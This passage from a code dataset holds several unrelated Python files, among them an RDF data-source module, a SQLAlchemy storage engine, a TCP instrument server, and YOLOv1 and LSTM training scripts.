\"\"\"\n def __init__(self, infile):\n \"\"\"\n given a filename parse into many BIRDpacket instances\n \"\"\"\n super(BIRDpackets, self).__init__()\n with open(infile, 'r') as fp:\n dat = fp.readlines()\n dat = [v.strip() for v in dat]\n self.filename = infile\n # make this class a list of BIRDpacket objects\n self.extend([BIRDpacket(v, self.filename) for v in dat])\n \n def __str__(self):\n return(\"{0} packets: {1} bad CRC\".format(len(self), int(sum([v.valid_crc for v in self if not v.valid_crc]))))\n\n __repr__ = __str__\n","sub_path":"L0toL1/packet.py","file_name":"packet.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"115858828","text":"#!/usr/bin/python3\n\"\"\"This module defines a class to manage database storage for hbnb clone\"\"\"\nimport MySQLdb\nfrom sqlalchemy.orm import sessionmaker, scoped_session, Session\nfrom models.base_model import BaseModel, Base\nimport os\nfrom sqlalchemy.engine import create_engine\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\n\n\nclass DBStorage:\n \"\"\"class DBStorage\"\"\"\n __engine = None\n __session = None\n\n def __init__(self):\n \"\"\"__init__\"\"\"\n username = os.getenv('HBNB_MYSQL_USER')\n password = os.getenv('HBNB_MYSQL_PWD')\n host = os.getenv('HBNB_MYSQL_HOST')\n database = os.getenv('HBNB_MYSQL_DB')\n self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'.format(\n username, password, host, database), pool_pre_ping=True)\n if os.getenv('HBNB_ENV') == 'test':\n Base.metadata.drop_all(self.__engine)\n\n def all(self, cls=None):\n \"\"\"Returns a dictionary of models currently in storage\"\"\"\n classes = {\n 'BaseModel': BaseModel, 'User': User, 'Place': Place,\n 'State': State, 'City': City, 'Amenity': Amenity,\n 'Review': Review\n }\n result = {}\n if cls in classes:\n objs = self.__session.query(classes[cls]).all()\n for obj in objs:\n key = '{}.{}'.format(obj.__class__.__name__, obj.id)\n result[key] = obj\n elif cls is None:\n for clas in classes:\n query = self.__session.query(classes[clas]).all()\n for obj in query:\n key = '{}.{}'.format(obj.__class__.__name__, obj.id)\n result[key] = obj\n return result\n\n def new(self, obj):\n \"\"\"new\"\"\"\n if obj:\n self.__session.add(obj)\n\n def save(self):\n \"\"\"save\"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\"delete\"\"\"\n if obj is not None:\n self.__session.delete(obj)\n\n def reload(self):\n \"\"\"reload\"\"\"\n Base.metadata.create_all(self.__engine)\n X = sessionmaker(bind=self.__engine, expire_on_commit=False)\n Session = scoped_session(X)\n self.__session = Session()\n\n def close(self):\n \"\"\"close\"\"\"\n self.__session.remove()","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"517857640","text":"#!/usr/bin/env python\n\"\"\"\nCompute expression in the defined landing intervals associated with counting units\n\"\"\"\n\nimport sys\nimport optparse\nfrom maps.exp import DGE\n\n################################################################################\n\ndef process_command_line(argv):\n if argv is None:\n argv = sys.argv[1:]\n \n usage = \"%s\\nusage: prog [options] f_read f_gtf\" % __doc__\n parser = optparse.OptionParser(usage, \n formatter=optparse.TitledHelpFormatter(width=178),\n add_help_option=True)\n \n parser.add_option(\"-t\", \"--type\", type=\"string\", dest=\"featuretype\",\n default = \"exon\", help = \"feature type (3rd column in GTF file)[exon]\")\n \n parser.add_option(\"-u\", \"--unit\", type=\"string\", dest=\"unit\",\n default = \"transcript_id\", help = \"GTF attribute as counting unit[transcript_id]\")\n\n parser.add_option(\"-o\", \"--outfile\", type=\"string\", dest=\"outfile\",\n help = \"out file name\")\n\n (options, args) = parser.parse_args()\n \n if len(args) != 2:\n parser.error('No required parameters')\n \n return options, args\n\n################################################################################\n\ndef main():\n options, args = process_command_line(None)\n f_read = args[0]\n f_gtf = args[1]\n \n dge = DGE(f_read, f_gtf, feature_type=options.featuretype, \n id_feature = \"gene_id\", id_count=options.unit)\n\n outhandle = sys.stdout\n if options.outfile:\n outhandle = open(options.outfile, \"w\")\n \n dge.count(outhandle)\n \n if options.outfile:\n outhandle.close()\n \n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/land2exp.py","file_name":"land2exp.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"355883243","text":"from __future__ import print_function\nimport sqlite3\nimport hashlib\nfrom rdflib import URIRef, Literal, Graph, Namespace, ConjunctiveGraph\nfrom rdflib.namespace import RDFS, RDF, NamespaceManager\nfrom datetime import datetime as DT\nimport datetime\nimport transaction\nimport os\nimport traceback\nimport logging\nfrom .utils import grouper\nfrom .configure import Configureable, Configure, ConfigValue\n\n__all__ = [\n \"Data\",\n \"DataUser\",\n \"RDFSource\",\n \"SerializationSource\",\n \"TrixSource\",\n \"SPARQLSource\",\n \"SleepyCatSource\",\n \"DefaultSource\",\n \"ZODBSource\"]\n\nL = logging.getLogger(__name__)\n\n\n_B_UNSET = object()\n\n\nclass _B(ConfigValue):\n\n def __init__(self, f):\n self.v = _B_UNSET\n self.f = f\n\n def get(self):\n if self.v is _B_UNSET:\n self.v = self.f()\n\n return self.v\n\n def invalidate(self):\n self.v = None\n\n def __repr__(self):\n if self.v is _B_UNSET:\n return 'Thunk of ' + repr(self.f)\n return repr(self.v)\n\n\nZERO = datetime.timedelta(0)\n\n\nclass _UTC(datetime.tzinfo):\n\n \"\"\"UTC\"\"\"\n\n def utcoffset(self, dt):\n return ZERO\n\n def tzname(self, dt):\n return \"UTC\"\n\n def dst(self, dt):\n return ZERO\n\n\nutc = _UTC()\n\n\nclass DataUser(Configureable):\n\n \"\"\" A convenience wrapper for users of the database\n\n Classes which use the database should inherit from DataUser.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(DataUser, self).__init__(*args, **kwargs)\n self.__base_namespace = None\n\n @property\n def base_namespace(self):\n if self.__base_namespace is not None:\n return self.__base_namespace\n return self.conf['rdf.namespace']\n\n @base_namespace.setter\n def base_namespace(self, value):\n self.__base_namespace = value\n\n @property\n def rdf(self):\n return self.conf['rdf.graph']\n\n @property\n def namespace_manager(self):\n return self.conf.get('rdf.namespace_manager', None)\n\n def _remove_from_store(self, g):\n # Note the assymetry with _add_to_store. You must add actual elements, but deletes\n # can be performed as a query\n for group in grouper(g, 1000):\n temp_graph = Graph()\n for x in group:\n if x is not None:\n temp_graph.add(x)\n else:\n break\n s = \" DELETE DATA {\" + temp_graph.serialize(format=\"nt\") + \" } \"\n L.debug(\"deleting. s = \" + s)\n self.conf['rdf.graph'].update(s)\n\n def _add_to_store(self, g, graph_name=False):\n if self.conf['rdf.store'] == 'SPARQLUpdateStore':\n # XXX With Sesame, for instance, it is probably faster to do a PUT over\n # the endpoint's rest interface. Just need to do it for some common\n # endpoints\n\n try:\n gs = g.serialize(format=\"nt\")\n except Exception:\n gs = _triples_to_bgp(g)\n\n if graph_name:\n s = \" INSERT DATA { GRAPH \" + graph_name.n3() + \" {\" + gs + \" } } \"\n else:\n s = \" INSERT DATA { \" + gs + \" } \"\n L.debug(\"update query = \" + s)\n self.conf['rdf.graph'].update(s)\n else:\n gr = self.conf['rdf.graph']\n if self.conf['rdf.source'] == 'ZODB':\n transaction.commit()\n transaction.begin()\n for x in g:\n gr.add(x)\n if self.conf['rdf.source'] == 'ZODB':\n transaction.commit()\n transaction.begin()\n\n # infer from the added statements\n # self.infer()\n\n def infer(self):\n \"\"\" Fire FuXi rule engine to infer triples \"\"\"\n\n from FuXi.Rete.RuleStore import SetupRuleStore\n from FuXi.Rete.Util import generateTokenSet\n from FuXi.Horn.HornRules import HornFromN3\n # fetch the derived object's graph\n semnet = self.rdf\n rule_store, rule_graph, network = SetupRuleStore(makeNetwork=True)\n closureDeltaGraph = Graph()\n network.inferredFacts = closureDeltaGraph\n # build a network of rules\n for rule in HornFromN3('testrules.n3'):\n network.buildNetworkFromClause(rule)\n # apply rules to original facts to infer new facts\n network.feedFactsToAdd(generateTokenSet(semnet))\n # combine original facts with inferred facts\n for x in closureDeltaGraph:\n self.rdf.add(x)\n\n def add_reference(self, g, reference_iri):\n \"\"\"\n Add a citation to a set of statements in the database\n\n :param triples: A set of triples to annotate\n \"\"\"\n new_statements = Graph()\n ns = self.conf['rdf.namespace']\n for statement in g:\n statement_node = self._reify(new_statements, statement)\n new_statements.add(\n (URIRef(reference_iri),\n ns['asserts'],\n statement_node))\n\n self.add_statements(g + new_statements)\n\n def retract_statements(self, graph):\n \"\"\"\n Remove a set of statements from the database.\n\n :param graph: An iterable of triples\n \"\"\"\n self._remove_from_store_by_query(graph)\n\n def _remove_from_store_by_query(self, q):\n s = \" DELETE WHERE {\" + q + \" } \"\n L.debug(\"deleting. s = \" + s)\n self.conf['rdf.graph'].update(s)\n\n def add_statements(self, graph):\n \"\"\"\n Add a set of statements to the database.\n Annotates the addition with uploader name, etc\n\n :param graph: An iterable of triples\n \"\"\"\n self._add_to_store(graph)\n\n def _reify(self, g, s):\n \"\"\"\n Add a statement object to g that binds to s\n \"\"\"\n n = self.conf['new_graph_uri'](s)\n g.add((n, RDF['type'], RDF['Statement']))\n g.add((n, RDF['subject'], s[0]))\n g.add((n, RDF['predicate'], s[1]))\n g.add((n, RDF['object'], s[2]))\n return n\n\n\nclass Data(Configure):\n\n \"\"\"\n Provides configuration for access to the database.\n\n Usually doesn't need to be accessed directly\n \"\"\"\n\n def __init__(self, conf=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n conf : Configure\n A Configure object\n \"\"\"\n super(Data, self).__init__(**kwargs)\n\n if conf is not None:\n self.copy(conf)\n else:\n self.copy(Configureable.default)\n self.namespace = Namespace(\"http://openworm.org/entities/\")\n self.molecule_namespace = Namespace(\"http://openworm.org/entities/molecules/\")\n self['rdf.namespace'] = self.namespace\n self['molecule_name'] = self._molecule_hash\n self['new_graph_uri'] = self._molecule_hash\n\n @classmethod\n def load(cls, file_name):\n \"\"\" Load a file into a new Data instance storing configuration in a JSON format \"\"\"\n return cls.open(file_name)\n\n @classmethod\n def open(cls, file_name):\n \"\"\" Load a file into a new Data instance storing configuration in a JSON format \"\"\"\n return cls(conf=Configure.open(file_name))\n\n def openDatabase(self):\n self.init_database()\n\n def init_database(self):\n \"\"\" Open the configured database \"\"\"\n self._init_rdf_graph()\n L.debug(\"opening \" + str(self.source))\n self.source.open()\n nm = NamespaceManager(self['rdf.graph'])\n self['rdf.namespace_manager'] = nm\n self['rdf.graph'].namespace_manager = nm\n\n # A runtime version number for the graph should update for all changes\n # to the graph\n self['rdf.graph.change_counter'] = 0\n\n self['rdf.graph']._add = self['rdf.graph'].add\n self['rdf.graph']._remove = self['rdf.graph'].remove\n self['rdf.graph'].add = self._my_graph_add\n self['rdf.graph'].remove = self._my_graph_remove\n nm.bind(\"\", self['rdf.namespace'])\n\n def _my_graph_add(self, triple):\n self['rdf.graph']._add(triple)\n\n # It's important that this happens _after_ the update otherwise anyone\n # checking could think they have the lastest version when they don't\n self['rdf.graph.change_counter'] += 1\n\n def _my_graph_remove(self, triple_or_quad):\n self['rdf.graph']._remove(triple_or_quad)\n\n # It's important that this happens _after_ the update otherwise anyone\n # checking could think they have the lastest version when they don't\n self['rdf.graph.change_counter'] += 1\n\n def closeDatabase(self):\n \"\"\" Close a the configured database \"\"\"\n self.source.close()\n\n def _init_rdf_graph(self):\n # Set these in case they were left out\n self['rdf.source'] = self.get('rdf.source', 'default')\n self['rdf.store'] = self.get('rdf.store', 'default')\n self['rdf.store_conf'] = self.get('rdf.store_conf', 'default')\n\n # XXX:The conf=self can probably be removed\n self.sources = {'sqlite': SQLiteSource,\n 'sparql_endpoint': SPARQLSource,\n 'sleepycat': SleepyCatSource,\n 'default': DefaultSource,\n 'trix': TrixSource,\n 'serialization': SerializationSource,\n 'zodb': ZODBSource}\n source = self.sources[self['rdf.source'].lower()](conf=self)\n self.source = source\n\n self.link('semantic_net_new', 'semantic_net', 'rdf.graph')\n self['rdf.graph'] = source\n return source\n\n def _molecule_hash(self, data):\n return URIRef(\n self.molecule_namespace[\n hashlib.sha224(\n str(data)).hexdigest()])\n\n def __setitem__(self, k, v):\n return Configure.__setitem__(self, k, v)\n\n def __getitem__(self, k):\n return Configure.__getitem__(self, k)\n\n\ndef modification_date(filename):\n t = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(t)\n\n\nclass RDFSource(Configureable, ConfigValue):\n\n \"\"\" Base class for data sources.\n\n Alternative sources should dervie from this class\n \"\"\"\n\n def __init__(self, **kwargs):\n super(RDFSource, self).__init__(**kwargs)\n self.graph = False\n\n def get(self):\n if self.graph is False:\n raise Exception(\n \"Must call openDatabase on Data object before using the database\")\n return self.graph\n\n def close(self):\n if self.graph is False:\n return\n self.graph.close()\n self.graph = False\n\n def open(self):\n \"\"\" Called on ``PyOpenWorm.connect()`` to set up and return the rdflib graph.\n Must be overridden by sub-classes.\n \"\"\"\n raise NotImplementedError()\n\n\nclass SerializationSource(RDFSource):\n\n \"\"\" Reads from an RDF serialization or, if the configured database is more\n recent, then from that.\n\n The database store is configured with::\n\n \"rdf.source\" = \"serialization\"\n \"rdf.store\" = \n \"rdf.serialization\" = \n \"rdf.serialization_format\" = \n \"rdf.store_conf\" = \n\n \"\"\"\n\n def open(self):\n if not self.graph:\n self.graph = True\n import glob\n # Check the ages of the files. Read the more recent one.\n g0 = ConjunctiveGraph(store=self.conf['rdf.store'])\n database_store = self.conf['rdf.store_conf']\n source_file = self.conf['rdf.serialization']\n file_format = self.conf['rdf.serialization_format']\n # store_time only works for stores that are on the local\n # machine.\n try:\n store_time = modification_date(database_store)\n # If the store is newer than the serialization\n # get the newest file in the store\n for x in glob.glob(database_store + \"/*\"):\n mod = modification_date(x)\n if store_time < mod:\n store_time = mod\n except Exception:\n store_time = DT.min\n\n trix_time = modification_date(source_file)\n\n g0.open(database_store, create=True)\n\n if store_time > trix_time:\n # just use the store\n pass\n else:\n # delete the database and read in the new one\n # read in the serialized format\n g0.parse(source_file, format=file_format)\n\n self.graph = g0\n\n return self.graph\n\n\nclass TrixSource(SerializationSource):\n\n \"\"\" A SerializationSource specialized for TriX\n\n The database store is configured with::\n\n \"rdf.source\" = \"trix\"\n \"rdf.trix_location\" = \n \"rdf.store\" = \n \"rdf.store_conf\" = \n\n \"\"\"\n\n def __init__(self, **kwargs):\n SerializationSource.__init__(self, **kwargs)\n h = self.conf.get('trix_location', 'UNSET')\n self.conf.link('rdf.serialization', 'trix_location')\n self.conf['rdf.serialization'] = h\n self.conf['rdf.serialization_format'] = 'trix'\n\n\ndef _rdf_literal_to_gp(x):\n return x.n3()\n\n\ndef _triples_to_bgp(trips):\n # XXX: Collisions could result between the variable names of different\n # objects\n g = \" .\\n\".join(\" \".join(_rdf_literal_to_gp(x) for x in y) for y in trips)\n return g\n\n\nclass SPARQLSource(RDFSource):\n\n \"\"\" Reads from and queries against a remote data store\n\n ::\n\n \"rdf.source\" = \"sparql_endpoint\"\n \"\"\"\n\n def open(self):\n # XXX: If we have a source that's read only, should we need to set the\n # store separately??\n g0 = ConjunctiveGraph('SPARQLUpdateStore')\n g0.open(tuple(self.conf['rdf.store_conf']))\n self.graph = g0\n return self.graph\n\n\nclass SleepyCatSource(RDFSource):\n\n \"\"\" Reads from and queries against a local Sleepycat database\n\n The database can be configured like::\n\n \"rdf.source\" = \"Sleepycat\"\n \"rdf.store_conf\" = \n \"\"\"\n\n def open(self):\n import logging\n # XXX: If we have a source that's read only, should we need to set the\n # store separately??\n g0 = ConjunctiveGraph('Sleepycat')\n self.conf['rdf.store'] = 'Sleepycat'\n g0.open(self.conf['rdf.store_conf'], create=True)\n self.graph = g0\n logging.debug(\"Opened SleepyCatSource\")\n\n\nclass SQLiteSource(RDFSource):\n\n \"\"\" Reads from and queries against a SQLite database\n\n See see the SQLite database :file:`db/celegans.db` for the format\n\n The database store is configured with::\n\n \"rdf.source\" = \"Sleepycat\"\n \"sqldb\" = \"/home/USER/openworm/PyOpenWorm/db/celegans.db\",\n \"rdf.store\" = \n \"rdf.store_conf\" = \n\n Leaving ``rdf.store`` unconfigured simply gives an in-memory data store.\n \"\"\"\n\n def open(self):\n conn = sqlite3.connect(self.conf['sqldb'])\n cur = conn.cursor()\n\n # first step, grab all entities and add them to the graph\n n = self.conf['rdf.namespace']\n\n cur.execute(\"SELECT DISTINCT ID, Entity FROM tblentity\")\n g0 = ConjunctiveGraph(self.conf['rdf.store'])\n g0.open(self.conf['rdf.store_conf'], create=True)\n\n for r in cur.fetchall():\n # first item is a number -- needs to be converted to a string\n first = str(r[0])\n # second item is text\n second = str(r[1])\n\n # This is the backbone of any RDF graph. The unique\n # ID for each entity is encoded as a URI and every other piece of\n # knowledge about that entity is connected via triples to that URI\n # In this case, we connect the common name of that entity to the\n # root URI via the RDFS label property.\n g0.add((n[first], RDFS.label, Literal(second)))\n\n # second step, get the relationships between them and add them to the\n # graph\n cur.execute(\n \"SELECT DISTINCT EnID1, Relation, EnID2, Citations FROM tblrelationship\")\n\n gi = ''\n\n i = 0\n for r in cur.fetchall():\n # all items are numbers -- need to be converted to a string\n first = str(r[0])\n second = str(r[1])\n third = str(r[2])\n prov = str(r[3])\n\n ui = self.conf['molecule_name'](prov)\n gi = Graph(g0.store, ui)\n\n gi.add((n[first], n[second], n[third]))\n\n g0.add([ui, RDFS.label, Literal(str(i))])\n if (prov != ''):\n g0.add([ui, n[u'text_reference'], Literal(prov)])\n\n i = i + 1\n\n cur.close()\n conn.close()\n self.graph = g0\n\n\nclass DefaultSource(RDFSource):\n\n \"\"\" Reads from and queries against a configured database.\n\n The default configuration.\n\n The database store is configured with::\n\n \"rdf.source\" = \"default\"\n \"rdf.store\" = \n \"rdf.store_conf\" = \n\n Leaving unconfigured simply gives an in-memory data store.\n \"\"\"\n\n def open(self):\n self.graph = ConjunctiveGraph(self.conf['rdf.store'])\n self.graph.open(self.conf['rdf.store_conf'], create=True)\n\n\nclass ZODBSource(RDFSource):\n\n \"\"\" Reads from and queries against a configured Zope Object Database.\n\n If the configured database does not exist, it is created.\n\n The database store is configured with::\n\n \"rdf.source\" = \"ZODB\"\n \"rdf.store_conf\" = \n\n Leaving unconfigured simply gives an in-memory data store.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ZODBSource, self).__init__(*args, **kwargs)\n self.conf['rdf.store'] = \"ZODB\"\n\n def open(self):\n import ZODB\n from ZODB.FileStorage import FileStorage\n self.path = self.conf['rdf.store_conf']\n openstr = os.path.abspath(self.path)\n\n fs = FileStorage(openstr)\n self.zdb = ZODB.DB(fs, cache_size=1600)\n self.conn = self.zdb.open()\n root = self.conn.root()\n if 'rdflib' not in root:\n root['rdflib'] = ConjunctiveGraph('ZODB')\n self.graph = root['rdflib']\n try:\n transaction.commit()\n except Exception:\n # catch commit exception and close db.\n # otherwise db would stay open and follow up tests\n # will detect the db in error state\n L.warning('Forced to abort transaction on ZODB store opening')\n traceback.print_exc()\n transaction.abort()\n transaction.begin()\n self.graph.open(self.path)\n\n def close(self):\n if self.graph is False:\n return\n\n self.graph.close()\n\n try:\n transaction.commit()\n except Exception:\n # catch commit exception and close db.\n # otherwise db would stay open and follow up tests\n # will detect the db in error state\n traceback.print_exc()\n L.warning('Forced to abort transaction on ZODB store closing')\n transaction.abort()\n self.conn.close()\n self.zdb.close()\n self.graph = False\n","sub_path":"PyOpenWorm/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":19609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"631712949","text":"\"\"\"\nCopyright (C) 2013-2018 Calliope contributors listed in AUTHORS.\nLicensed under the Apache 2.0 License (see LICENSE file).\n\ndebug.py\n~~~~~~~~\n\nDebugging tools.\n\n\"\"\"\n\nfrom functools import reduce\nimport operator\n\nimport ruamel.yaml as ruamel_yaml\n\n\ndef get_from_dict(data_dict, map_list):\n return reduce(operator.getitem, map_list, data_dict)\n\n\ndef apply_to_dict(data_dict, map_list, func, args):\n getattr(get_from_dict(data_dict, map_list[:-1])[map_list[-1]], func)(*args)\n\n\ndef save_debug_data(model_run, debug_data, out_file):\n # README: currently based on ruamel.yaml 0.15 which is a mix of old\n # and new API - possibly needs a bit of rewriting once ruamel.yaml\n # has progressed a bit further\n yaml = ruamel_yaml.YAML()\n\n model_run_debug = model_run.copy()\n del model_run_debug['timeseries_data'] # Can't be serialised!\n\n # Turn sets in model_run into lists for YAML serialization\n for k, v in model_run_debug.sets.items():\n model_run_debug.sets[k] = list(v)\n\n debug_comments = debug_data['comments']\n debug_yaml = yaml.load(yaml.dump(model_run_debug.as_dict()))\n for k in debug_comments.model_run.keys_nested():\n v = debug_comments.model_run.get_key(k)\n keys = k.split('.')\n apply_to_dict(debug_yaml, keys[:-1], 'yaml_add_eol_comment', (v, keys[-1]))\n\n dumper = ruamel_yaml.dumper.RoundTripDumper\n dumper.ignore_aliases = lambda self, data: True\n\n with open(out_file, 'w') as f:\n ruamel_yaml.dump(\n debug_yaml, f,\n Dumper=dumper, default_flow_style=False\n )\n","sub_path":"calliope/core/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"364358316","text":"import threading, SocketServer, pickle, time, numpy\nimport socket\n\nclass TCPHandler(SocketServer.BaseRequestHandler):\n def handle(self):\n # self.request is the TCP socket connected to the client\n self.data = self.request.recv(1024).strip()\n # Check is present in dictionary\n if self.data == \"log\":\n self.request.send(self.server.log)\n return\n if self.data == \"monitor\":\n self.request.send(pickle.dumps(self.server.values))\n \n try:\n self.response = self.server.commands[self.data]()\n self.request.send(self.response)\n except:\n self.request.send(self.server.log)\n\ndef server(host = \"\", port = 9999, commands= {'log': 0}):\n #HOST, PORT = \"192.168.5.24\", 9999\n # Create the server, binding to localhost on port 9999\n server = SocketServer.TCPServer((host, port), TCPHandler)\n server_thread = threading.Thread(target=server.serve_forever)\n server_thread.start()\n \n server.log = \"\"\n server.values = []\n \n return server\n\ndef connect(command, host, port = 9999):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n s.send(command)\n data = s.recv(2**15)\n \n return data\n s.close()\n \n \nif __name__ == '__main__':\n s = server()\n i = 0\n while True:\n i = i +1\n time.sleep(0.3)\n s.values = [numpy.linspace(i,i+2,3),numpy.linspace(i-5,i+2-5,3),]\n ","sub_path":"control/inst_server.py","file_name":"inst_server.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"142809225","text":"# import library\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nimport torchvision\nimport glob\nimport os\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport datetime\n\n# import self-made function\nfrom dataset import hw2DataSet\nfrom models import Yolov1_vgg16bn\nfrom yoloLoss import yoloLoss\n\n#############################\n#1. Creating a custom dataset\n#############################\n#[2]\n# load the trainset and testset\ntrainset = hw2DataSet(root='../hw2_train_val/train15000/',\n transform=transforms.ToTensor())\ntestset = hw2DataSet(root='../hw2_train_val/val1500/',\n transform=transforms.ToTensor())\nprint('# images in trainset:', len(trainset))\nprint('# images in testset:', len(testset))\n\n\n#[3]\n# Use the torch dataloader to iterate through the dataset\ntrainset_loader = DataLoader(trainset, batch_size=16, shuffle=True, num_workers=4)\ntestset_loader = DataLoader(testset, batch_size=16, shuffle=False, num_workers=4)\n# get some random training images\ndataiter = iter(trainset_loader)\nimages, labels = dataiter.next()\nprint('Image tensor in each batch:', images.shape, images.dtype)\nprint('Label tensor in each batch:', labels.shape, labels.dtype)\n\n\n#[4]\n# We can visualize what contains in each batch:\n# functions to show an image\ndef imshow(img):\n npimg = img.numpy() # transfer torch to numpy\n plt.imshow(np.transpose(npimg, (1, 2, 0))) #if using numpy image tranfered from torch\n# functions to show an image's label in 7x7x26\ndef labelshow(img_number):\n for patchi in range(7):\n for patchj in range(7):\n print (patchi,patchj,labels[img_number][patchi][patchj])\n\n# show images and label\n'''imshow(torchvision.utils.make_grid(images))\nlabelshow(0)\nplt.show()'''\n\n\n###########################################\n#2. Creating a Convolutional Neural Network\n###########################################\n#[5]\n# Use GPU if available, otherwise stick with cpu\nuse_cuda = torch.cuda.is_available()\ntorch.manual_seed(123)\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint('Device used:', device)\n\n\n#[6]\n# import model from model.py\nmodel = Yolov1_vgg16bn(pretrained=True).to(device) # Remember to move the model to \"device\"\nprint(model)\nlogfile = open('log.txt', 'w')\n\ndef load_checkpoint(checkpoint_path, model,optimizer):\n state = torch.load(checkpoint_path) # for cuda\n #state = torch.load(checkpoint_path, map_location=device) #for cpu\n model.load_state_dict(state['state_dict'])\n optimizer.load_state_dict(state['optimizer'])\n print('model loaded from %s' % checkpoint_path)\n\n#####################\n#3. Train the network\n#####################\n#[7]\n# define the training loop\ndef train(model, epoch, log_interval=10):\n learning_rate = 0.002\n optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9, weight_decay=5e-4)\n criterion = yoloLoss(5,0.05)\n #criterion = nn.MSELoss()\n load_checkpoint(\"map0799/best.pth\",model,optimizer)\n best_test_loss = np.inf\n iteration = 0 # one iteration would go through a ep\n for ep in range(epoch):\n model.train() # Important: set training mode\n if ep == 0:\n learning_rate = 0.001\n for param_group in optimizer.param_groups:\n param_group['lr'] = learning_rate\n if ep == 20:\n learning_rate = 0.0005\n for param_group in optimizer.param_groups:\n param_group['lr'] = learning_rate\n #total_loss = 0.\n for batch_idx,(images,target) in enumerate(trainset_loader):\n images, target = images.to(device), target.to(device)\n optimizer.zero_grad() #to zero\n pred = model(images)\n loss = criterion(pred,target)\n #total_loss += loss.images[0]\n loss.backward() #backpro\n optimizer.step() #update\n #optimizer.zero_grad() #to zero\n if iteration % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n ep, batch_idx * len(images), len(trainset_loader.dataset),\n 100. * batch_idx / len(trainset_loader), loss.item()))\n iteration += 1\n\n # Evaluate at the end of each epoch\n best_test_loss = validation(model,optimizer,best_test_loss,ep)\n\n\n#[8]\n# evaluate at the end of each epoch.\ndef validation(model,optimizer,best_test_loss,ep):\n model.eval()\n criterion = yoloLoss(5,0.05)\n #criterion = nn.MSELoss()\n validation_loss = 0.0\n with torch.no_grad(): # This will free the GPU memory used for back-prop\n for batch_idx,(images,target) in enumerate(testset_loader):\n images, target = images.to(device), target.to(device)\n pred = model(images)\n loss = criterion(pred,target)\n validation_loss += loss.item()\n validation_loss /= len(testset_loader)\n print (\"validation avg loss:\" + str(validation_loss) + '\\n')\n\n # save best loss as best.pth\n if best_test_loss > validation_loss:\n best_test_loss = validation_loss\n print('get best test loss %.5f' % best_test_loss)\n save_checkpoint('best.pth',model,optimizer)\n if ep%10==0:\n save_checkpoint('best_'+str(ep)+'.pth',model,optimizer)\n\n # write to logfile\n logfile.writelines(\"ep: \"+str(ep)+\" validation avg loss:\" + str(validation_loss) + \"\\n\")\n logfile.flush()\n\n return best_test_loss\n\ndef save_checkpoint(checkpoint_path, model, optimizer):\n state = {'state_dict': model.state_dict(),\n 'optimizer' : optimizer.state_dict()}\n torch.save(state, checkpoint_path)\n print('model saved to %s' % checkpoint_path)\n\n#[9]\n# It's time to train the model!\nepochs_num = 50\nnow = datetime.datetime.now()\nlogfile.writelines(\"start training at:\"+str(now)+\"\\n\")\nlogfile.flush()\ntrain(model, epochs_num)\nnow = datetime.datetime.now()\nlogfile.writelines(\"end training at:\"+str(now)+\"\\n\")\nlogfile.flush()\n","sub_path":"hw2_YOLOv1_object_detection/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"474431890","text":"import os\nimport time\nimport numpy as np\nimport csv\nimport pickle\nimport json\nimport keras.backend as K\n\nfrom keras.models import Model\nfrom keras.layers import Dense, Activation, Input, LSTM, Embedding, Dropout, TimeDistributed\nfrom keras.optimizers import RMSprop\nfrom keras.callbacks import LambdaCallback, CSVLogger, History, ModelCheckpoint\n\nfrom clean_data import tokenize_dir, clean_tokens\nfrom embed_words import train_word_model, dictionary_lookups, vectorize_words\n\n# working directory\npath = os.getcwd()\n\n# define data file and file extension\n# replace with location of data-set\ndata_path = ''\nextension = 'csv'\n\n# for saving\nversion_name = 'primary_train'\n\n# START\n# ----\n\n# LOAD DATA\n# --\n\nprint('\\nLoading data...')\n\nprint('Start-Time: ', time.ctime(time.time()))\ncorpus = tokenize_dir(data_path, extension)\nprint('End-Time: ', time.ctime(time.time()))\n\n# clean tokenize corpus\nsentences, max_sentence, max_sentence_len = clean_tokens(corpus)\n\nprint(\"max: %d \" % max_sentence_len)\n\nprint('Num sentences in original corpus:', len(corpus))\nprint('Num sentences for model:', len(sentences))\n\n# print('\\nTRAINING CORPUS: \\n' + corpus)\n\n\n# GENERATE EMBEDDINGS\n# ---------------\n\nprint('\\nCreating word embeddings...')\n# train and save the embedding model\nword_model = train_word_model(corpus, 'word_model')\n\n# get the initial model weight\nembed_weights = word_model.wv.syn0\n# get the vocab size and embedding shape for model\nvocab_size, embedding_size = embed_weights.shape\n\n# get the dictionary lookup 